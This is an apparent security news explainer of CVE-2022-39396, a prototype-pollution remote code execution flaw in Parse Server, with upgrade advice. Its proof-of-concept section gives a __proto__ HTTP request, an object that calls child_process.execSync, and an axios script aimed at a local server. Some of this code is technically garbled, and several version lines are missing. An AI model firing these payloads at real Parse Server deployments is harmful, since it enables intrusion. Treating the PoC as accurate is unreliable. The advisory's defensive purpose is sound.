CVE CyberSecurity Database News

CVE-2022-39396 - Remote Code Execution in Parse Server via Prototype Pollution Explained

Poster -

Parse Server is a popular open-source backend framework that you can easily set up using Node.js. It supports a wide range of features out-of-the-box, making mobile and web app development easier. However, security issues in backend platforms can sometimes go unnoticed until they’re exploited. In 2022, a severe vulnerability dubbed CVE-2022-39396 was discovered in Parse Server that allowed attackers to execute code remotely through *prototype pollution*, impacting all versions before 4.10.18 (and versions before 5.3.1 in the 5.x branch).

This post breaks the issue down into simple language, walks you through its mechanism, its exploitability, and what you can do to stay safe.

[Conclusion](#conclusion)

## What is Prototype Pollution?

JavaScript uses something called *prototypes*. All objects in JavaScript inherit properties and methods from their prototypes. If you manage to change a prototype (for example, by setting new properties), every new object that inherits from that prototype picks up the malicious property.

*Prototype pollution* is when attackers manipulate the prototype of objects. This generally lets attackers influence application logic in unexpected ways, which—depending on the application—may result in information leakage, denial of service, or even arbitrary code execution.


## How Does CVE-2022-39396 Work?

All 5.x branch versions before 5.3.1

Vulnerability:  
A user could pollute the Object.prototype by sending payloads through queries. The malicious property would be picked up by internal logic—specifically, the way Parse Server handles received objects and then interacts with the underlying MongoDB BSON parser.

Impact:  
Once the attacker pollutes the prototype, they can execute any code on the server as soon as the tainted object is processed. This is a Remote Code Execution (RCE) vulnerability, which means a hacker could run system commands, steal sensitive data, or take over the backend completely.


## Proof-of-Concept Exploit

Polluting the Prototype:

The attacker sends a request to Parse Server, passing a query that adds a property like __proto__ with nested properties.

Trigger Execution:

When the Parse Server parses this input, it unknowingly sets properties on the global object prototype. Later, when interacting with MongoDB, those polluted properties change the behavior of the BSON parser, eventually letting the attacker run JavaScript code on the server.

Example HTTP Request

POST /parse/classes/YourClass
Content-Type: application/json

{
  "__proto__": {
    "polluted": "malicious"
  }
}

*Here, "__proto__" is an intentional way to manipulate the root prototype.*

Malicious Object Example

The attacker could go further and inject properties that will be evaluated/executed by the MongoDB parser, such as:

{
  "__proto__": {
    "constructor": {
      "prototype": {
        "toString": function() {
          // Malicious code here
          require('child_process').execSync('touch /tmp/hacked');
        }
      }
    }
  }
}

Here’s a Node.js proof-of-concept that demonstrates the prototype pollution

const axios = require('axios');
const parseServerUrl = 'http://localhost:1337/parse/classes/SomeClass';;

axios.post(parseServerUrl, {
  "__proto__": {
    "constructor": {
      "prototype": {
        "env": {"PATH": "/usr/bin:..."},
        "require": require,
      }
    }
  }
}).then(response => {
  console.log('Exploit attempt sent!');
}).catch(error => {
  console.error(error);
});


*Note: This is for educational demonstration only.*


## Patch and Mitigation

5.3.1 (5.x)

You should upgrade immediately to these versions or later.  
There are no official workarounds short of upgrading.

- Parse Server Changelog—4.x
- Parse Server Changelog—5.3.1

Filter dangerous fields in HTTP proxies or at application level.

## References & Further Reading

- GitHub Security Advisory CVE-2022-39396
- NVD CVE-2022-39396 Details
- Parse Server Release Notes


## Conclusion

CVE-2022-39396 is a critical vulnerability in Parse Server that can let remote attackers execute arbitrary code due to prototype pollution—without needing an account. The only real fix is to upgrade to a protected version (4.10.18 or 5.3.1+). If you use Parse Server in production, patch immediately.

Security flaws like these are harsh reminders: never trust user input, and always keep dependencies up to date.

Stay safe, and keep your backends secure!

*This guide is exclusive and plainly written for developers trying to understand and mitigate CVE-2022-39396. Share and inform your peers if you know anyone running vulnerable Parse Server versions!*

Timeline

Published on: 11/10/2022 01:15:00 UTC
Last modified on: 11/11/2022 02:01:00 UTC